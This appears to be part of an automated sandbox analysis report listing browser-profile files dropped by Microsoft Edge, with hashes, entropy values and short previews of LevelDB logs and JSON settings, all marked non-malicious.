                                                                                                                                                                                                                                                            SSDEEP:6:iOypXduIQ+q2PN723oH+TcwtrQMxIFUt8pXbbpdWZmwOpXXuIQVkwON723oH+TcM:7ypXw+vVaYebCFUt8pXbbm/OpXXeV5OI
                                                                                                                                                                                                                                                            MD5:30CCDD86E1380B297551B4D402275C8D
                                                                                                                                                                                                                                                            SHA1:82DC12A422BE514B38B5FDB654D80C02164F56CF
                                                                                                                                                                                                                                                            SHA-256:9F46E387ABAAE0831275121DACE181E2241865A407C0929648F21E7F8C3B3CBD
                                                                                                                                                                                                                                                            SHA-512:26591211CF781C033A607884D39DDC7E8ECA23B544698D3C9C6453365083A1ACE8C6B2B536483A895F737D80263141CD55614A84E1FEF47D6CDB74A59B46D776
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:07.563 1c0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/03/07-15:40:07.565 1c0c Recovering log #3.2025/03/07-15:40:07.569 1c0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2143
                                                                                                                                                                                                                                                            Entropy (8bit):3.3860108470090244
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:3qs+loo/D3T5bQn/i0fB0TKyWQnChTE4U2P24anChTEhfMeZ8Vdc5ObRelCeay16:3qnbj5bQn/Rp0WbQCOnCgCdhoUea/p
                                                                                                                                                                                                                                                            MD5:7599B81038ACA8937C10C7B0376E5E90
                                                                                                                                                                                                                                                            SHA1:5129E752658033141661A678F82AA54BD66D3155
                                                                                                                                                                                                                                                            SHA-256:2FB4112834293A78EB6E90CEA5896439498F1EAF69908133F83F55BAF4E85A43
                                                                                                                                                                                                                                                            SHA-512:1C4F83337FF914A9958BB54B3F59B35CC162B7A81895FBE5C4AC66FD4087CA4212D0678967EFCEDE6EE1C584F5E16018982921577256AAC687037DA0B0BA2D2B
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:SNSS.......(a.............(a........"(a.............(a.........(a.........)a.........)a......!..)a.................................(a..)a..1..,...)a..$...ca6d5df6_c002_4972_94da_b8c6a085a3a0...(a.........)a.................(a.....(a.........................(a.........................5..0...(a..&...{1E296679-D131-4D1D-B89B-0E3611E804F3}.....(a.........(a.........................)a.............)a......<...https://s28.q4cdn.com/392171258/files/doc_downloads/test.pdf............!........................................................................................................f.../...g.../..H.......`...........................................................................<...h.t.t.p.s.:././.s.2.8...q.4.c.d.n...c.o.m./.3.9.2.1.7.1.2.5.8./.f.i.l.e.s./.d.o.c._.d.o.w.n.l.o.a.d.s./.t.e.s.t...p.d.f.................................8.......0.......8....................................................................... .......................................................................8
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):20480
                                                                                                                                                                                                                                                            Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                            MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                            SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                            SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                            SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):356
                                                                                                                                                                                                                                                            Entropy (8bit):5.080813489574167
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypB0VFIq2PN723oH+Tcwt7Uh2ghZIFUt8pB0VFZZmwOpB0VFzkwON723oH+Tcz:7ypBsOvVaYebIhHh2FUt8pBsX/OpBsFy
                                                                                                                                                                                                                                                            MD5:B87BE9D72FE4A335EE876BCAB207E630
                                                                                                                                                                                                                                                            SHA1:16E193D5785D63AF24359E2421FFA1380E748B00
                                                                                                                                                                                                                                                            SHA-256:79D609B8C8482F5A0413E0FE5BD5F2D80447923B4D53C616586C7C3B85FDBCB7
                                                                                                                                                                                                                                                            SHA-512:0DAAE6B64895EC131538CB9AE644B940E30B69BE85CE7AEF4E56C3A5E80AC3EAF8F228855A259CDE4835E77F62FE620A1CB06AEF56B63280A1F924984B33130E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:06.004 1a80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/03/07-15:40:06.004 1a80 Recovering log #3.2025/03/07-15:40:06.004 1a80 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):356
                                                                                                                                                                                                                                                            Entropy (8bit):5.080813489574167
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypB0VFIq2PN723oH+Tcwt7Uh2ghZIFUt8pB0VFZZmwOpB0VFzkwON723oH+Tcz:7ypBsOvVaYebIhHh2FUt8pBsX/OpBsFy
                                                                                                                                                                                                                                                            MD5:B87BE9D72FE4A335EE876BCAB207E630
                                                                                                                                                                                                                                                            SHA1:16E193D5785D63AF24359E2421FFA1380E748B00
                                                                                                                                                                                                                                                            SHA-256:79D609B8C8482F5A0413E0FE5BD5F2D80447923B4D53C616586C7C3B85FDBCB7
                                                                                                                                                                                                                                                            SHA-512:0DAAE6B64895EC131538CB9AE644B940E30B69BE85CE7AEF4E56C3A5E80AC3EAF8F228855A259CDE4835E77F62FE620A1CB06AEF56B63280A1F924984B33130E
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:06.004 1a80 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2025/03/07-15:40:06.004 1a80 Recovering log #3.2025/03/07-15:40:06.004 1a80 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                                                                            Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                            MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                            SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                            SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                            SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                                                                                                            Entropy (8bit):0.0012471779557650352
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                                                                                                            MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                                                                                                            SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                                                                                                            SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                                                                                                            SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):438
                                                                                                                                                                                                                                                            Entropy (8bit):5.208414078588549
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:7ypXY+vVaYebvqBQFUt8pXr/OpXQV5OaYebvqBvJ:7ybVaYebvZg8MkOaYebvk
                                                                                                                                                                                                                                                            MD5:4DFE557A47DBA97909801CBA14F83A3D
                                                                                                                                                                                                                                                            SHA1:4C91A21129366BA8D7C24A51DDEDC9B7B7ED9586
                                                                                                                                                                                                                                                            SHA-256:E6D0085349E0CD9C5A961AFEC619F84F2C10281CB20ED586B5BF9686CB04C215
                                                                                                                                                                                                                                                            SHA-512:F07F2C05820C501360D3444F456F7F3444A70B3A75C23588654A0E4677A09D8FF14031F8B25400FFCC196A6D40D70DDDB5C9D33618AF739A1BC190573CA3D176
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:07.589 1c0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/03/07-15:40:07.597 1c0c Recovering log #3.2025/03/07-15:40:07.602 1c0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):438
                                                                                                                                                                                                                                                            Entropy (8bit):5.208414078588549
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:7ypXY+vVaYebvqBQFUt8pXr/OpXQV5OaYebvqBvJ:7ybVaYebvZg8MkOaYebvk
                                                                                                                                                                                                                                                            MD5:4DFE557A47DBA97909801CBA14F83A3D
                                                                                                                                                                                                                                                            SHA1:4C91A21129366BA8D7C24A51DDEDC9B7B7ED9586
                                                                                                                                                                                                                                                            SHA-256:E6D0085349E0CD9C5A961AFEC619F84F2C10281CB20ED586B5BF9686CB04C215
                                                                                                                                                                                                                                                            SHA-512:F07F2C05820C501360D3444F456F7F3444A70B3A75C23588654A0E4677A09D8FF14031F8B25400FFCC196A6D40D70DDDB5C9D33618AF739A1BC190573CA3D176
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:07.589 1c0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2025/03/07-15:40:07.597 1c0c Recovering log #3.2025/03/07-15:40:07.602 1c0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):111
                                                                                                                                                                                                                                                            Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                            MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                            SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                            SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                            SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):36864
                                                                                                                                                                                                                                                            Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                            MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                            SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                            SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                            SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:[]
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):111
                                                                                                                                                                                                                                                            Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                            MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                            SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                            SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                            SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):80
                                                                                                                                                                                                                                                            Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                            MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                            SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                            SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                            SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):426
                                                                                                                                                                                                                                                            Entropy (8bit):5.219215068216626
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:7ypy+vVaYebvqBZFUt8p//OpyV5OaYebvqBaJ:7ydVaYebvyg8sKOaYebvL
                                                                                                                                                                                                                                                            MD5:BEBCD287EC9D8D9496845FC27FC734B6
                                                                                                                                                                                                                                                            SHA1:A65165C53B153FAF64B6669B9F926D124E46EA85
                                                                                                                                                                                                                                                            SHA-256:A39ED1ACDC4F1A39F8044711527AF4F2B763644465E5E1BB6F719739B913AFCD
                                                                                                                                                                                                                                                            SHA-512:C6EB128DA07016A7B3316EA103B286193E27189DF14B7C1506EA33EE2437D5F9FFC15EE3E5D255C0AA839964BF35BE422C1D7EC89D8DEA4454782B86F22E1759
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:24.933 1c0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/03/07-15:40:24.941 1c0c Recovering log #3.2025/03/07-15:40:24.946 1c0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):426
                                                                                                                                                                                                                                                            Entropy (8bit):5.219215068216626
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:7ypy+vVaYebvqBZFUt8p//OpyV5OaYebvqBaJ:7ydVaYebvyg8sKOaYebvL
                                                                                                                                                                                                                                                            MD5:BEBCD287EC9D8D9496845FC27FC734B6
                                                                                                                                                                                                                                                            SHA1:A65165C53B153FAF64B6669B9F926D124E46EA85
                                                                                                                                                                                                                                                            SHA-256:A39ED1ACDC4F1A39F8044711527AF4F2B763644465E5E1BB6F719739B913AFCD
                                                                                                                                                                                                                                                            SHA-512:C6EB128DA07016A7B3316EA103B286193E27189DF14B7C1506EA33EE2437D5F9FFC15EE3E5D255C0AA839964BF35BE422C1D7EC89D8DEA4454782B86F22E1759
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:24.933 1c0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2025/03/07-15:40:24.941 1c0c Recovering log #3.2025/03/07-15:40:24.946 1c0c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):332
                                                                                                                                                                                                                                                            Entropy (8bit):5.180694319836845
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:iOypTrq2PN723oH+TcwtpIFUt8pTOZmwOpRkwON723oH+Tcwta/WLJ:7ypHvVaYebmFUt8pq/OpR5OaYebaUJ
                                                                                                                                                                                                                                                            MD5:8344D621258A57118AE2DABE39C6908E
                                                                                                                                                                                                                                                            SHA1:ECD54721ABB9F3BCB3D119D270E7B017AFBEE5A8
                                                                                                                                                                                                                                                            SHA-256:5E861CCF80F94577E2CCAD81E16251D1FBADF73C6447CE8DBF46D1D46D320245
                                                                                                                                                                                                                                                            SHA-512:215AC72ED4B36426E8F8565BBD832721C52893F5EF8C9771C30A61FD87923303C48429FD5E4F2C1421593B4DA95E6FD723C00A0E819FFC263C0E94626CF7A6D7
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:2025/03/07-15:40:06.007 1884 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2025/03/07-15:40:06.007 1884 Recovering log #3.2025/03/07-15:40:06.008 1884 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
